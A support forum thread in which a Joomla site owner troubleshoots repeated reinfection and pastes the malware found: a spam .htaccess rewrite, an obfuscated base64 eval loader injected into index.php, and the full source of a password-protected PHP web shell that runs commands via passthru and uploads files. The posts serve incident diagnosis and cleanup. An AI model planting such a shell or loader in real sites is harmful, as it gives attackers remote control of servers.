Menu

Topic-icon Site keeps getting infected even with SecurityCheck Pro

  • shibumi
  • shibumi's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
More
3 years 3 weeks ago - 3 years 3 weeks ago #4509 by shibumi
If I delete the SecurityCheck Pro generated .htaccess file I can get back into the front end... as soon as I generate a new .htaccess file with SecurityCheck Pro, I can no longer access the site's front end... delete the .htaccess file and I am able to access the front end again...
Back end access still accessible in both situations.

Don't know if this matters or not, but I upgraded my server to EasyApache4 with all sites now running PHP 7
Last edit: 3 years 3 weeks ago by shibumi.

Please Log in or Create an account to join the conversation.

More
3 years 3 weeks ago #4510 by Jose
Try setting the first dropdowns to No (don't forget save the changes); sometimes cause issues on some servers.

Regards,
Jose

Please Log in or Create an account to join the conversation.

  • shibumi
  • shibumi's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
More
3 years 3 weeks ago - 3 years 3 weeks ago #4511 by shibumi
No change... I use the same settings for all of my sites, and this is the only one giving me problems. The only way I can access the site is deleting the .htaccess file completely - if I revert back to the original Joomla .htaccess file, it works fine...

* after using the default Joomla 3.7.0 .htaccess file, then using SecurityCheck Pro to generate a new one, not getting 403 Forbidden message anymore... so strange
Last edit: 3 years 3 weeks ago by shibumi. Reason: new information

Please Log in or Create an account to join the conversation.

More
3 years 3 weeks ago #4512 by Jose
Then this is a permissions issue; check if the user that runs Joomla has permissions to access the .htacess file generated. Maybe the update you did is causing the issue.

Regards,
Jose

Please Log in or Create an account to join the conversation.

  • shibumi
  • shibumi's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
More
3 years 3 weeks ago #4536 by shibumi
Okay, so I turned off my AutoSSL feature for this domain on my WHM, and something is still wiping my .htaccess file that is generated with SecurityCheck Pro, and this morning it was overwritten with this content:
RewriteEngine On
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

instead of the usual:
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$

RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$

and, instead of the normal AutoSSL modified timestamp of today's date at 5:23am, it has a timestamp of December 11, 2009 8:01pm

At first I thought it was the AutoSSL feature that was wiping my .htaccess file to put it's code in, but after turning off that feature, and seeing that the .htaccess file was still getting wiped, and different code inserted, leads me to believe there is something else I'm missing.

File integrity check only shows 4 files modified:
.htaccess			/public_html/.htaccess					267		2009-12-11 18:01:59	Hash value has changed	
error_log			/public_html/administrator/error_log	6523153	2017-05-07 08:24:50	Hash value has changed	
configuration.php	/public_html/configuration.php			3129	2017-05-07 13:23:20	Hash value has changed	
index.php			/public_html/index.php					18083	2010-03-26 13:56:58	Hash value has changed

both .htaccess and index.php files were modified sometime between 10:00pm EDT last night and 1:00pm EDT today...

Malware scan shows 6 High alert files, and 58 medium alert files. Upon further inspection - I installed ZOO on a local copy of Joomla 3.7.0 and it doesn't even have a /media/zoo/applications/documentation folder - the only folder under applications is blog and page, nothing else. I'm not familiar with ZOO extensions, but again, I didn't build this site, and I don't have access to their "paid" extensions to confirm original code. I have attached the malware scan results from today's scan.

My root index.php file is once again injected with the same code after the opening <?php :
@set_time_limit(0);
$xmlname = 'mapss.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
	$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
	if (isset($_SERVER['REQUEST_URI'])){        
		$smuri = $_SERVER['REQUEST_URI'];        
	}else{
		if(isset($_SERVER['argv'])){       
			$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];     
		}else{      
			$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];        
		}
	}        
	return $smuri;        
} 


$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iZGtmck9jeHdXakJiWk

... more code here ...

Cc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
Attachments:

Please Log in or Create an account to join the conversation.

  • shibumi
  • shibumi's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
More
3 years 3 weeks ago #4537 by shibumi
So, I started uninstalling some extensions, namely ZOO and DJImageSlider, and ran malware scans after each removal. Now getting only 20 suspicious files, and found this file: /libraries/joomla/model/class.php - not part of the Joomla core files, so I looked at the code:
<?php 
ini_set('display_errors','Off');
error_reporting('E_ALL');
$multipart = "51c78cfb5147c2cfc";
$part = "12eb7b37ab656fe";
if (md5($_POST['multipart'])==$multipart.$part){
echo '
<div align="left">
<font size="1">:</font>
</div>
<form action="'.$_SERVER['PHP_SELF'].'" name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input">
<input type="hidden" name="multipart" size="30" class="pp" value="'.$_POST['multipart'].'">
<br>
<pre>';
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
echo  "<p>".@getcwd()."</p>";
}
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
   $pwddir = $_POST['dir'];
   $real = $_FILES['file']['name'];
   $dez = $pwddir."/".$real;
   copy($uploaded, $dez);
   echo "<p>$dez</p>";
}
echo '<form action="'.$_SERVER['PHP_SELF'].'" name="form1" method="post" enctype="multipart/form-data">
 <input type="text" name="dir" size="30" value="'.passthru("pwd").'">
 <input type="submit" name="submit2" value="Upload">
 <input type="file" name="file" size="15">
 <input type="hidden" name="multipart" size="30" class="pp" value="'.$_POST['multipart'].'">
	  </td>
    </tr>
</table>';
}
else 
{
echo '<head><form name="multipart" method="POST" enctype="multipart/form-data">
<input type="text" name="multipart" size="30" class="input">';
}
echo '</body>
</html>';
?>
Delete file, fix .htaccess file, remove code from index.php, and wait to see what happens tomorrow...

Please Log in or Create an account to join the conversation.

Time to create page: 0.084 seconds
Powered by Kunena Forum

Login or Sign In